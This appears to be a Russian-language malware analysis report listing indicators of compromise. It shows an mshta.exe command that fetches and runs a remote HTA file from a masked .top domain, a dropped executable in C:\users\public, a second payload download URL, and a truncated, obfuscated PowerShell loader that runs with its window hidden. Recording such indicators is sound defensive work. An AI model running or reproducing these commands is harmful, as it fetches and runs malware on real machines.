Техническая информация
- '<SYSTEM32>\mshta.exe' http://ga####riptease.top/out-262635005.hta
- 'C:\users\public\vbj.exe'
- vbj.exe
- C:\users\public\vbj.exe
- http://ga####riptease.top/out-262635005.hta
- http://ga####riptease.top/tr-staller.exe
- DNS ASK ga####riptease.top
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy UnRestricted -Window 1 [void] $null;$klfycmpwbxn = Get-Random -Min 3 -Max 4;$tghbrksc = ([char[]]([char]97..[char]122));$ldezik = -join ($tghbrksc | Get-Random -Count $klfycmpw...' (со скрытым окном)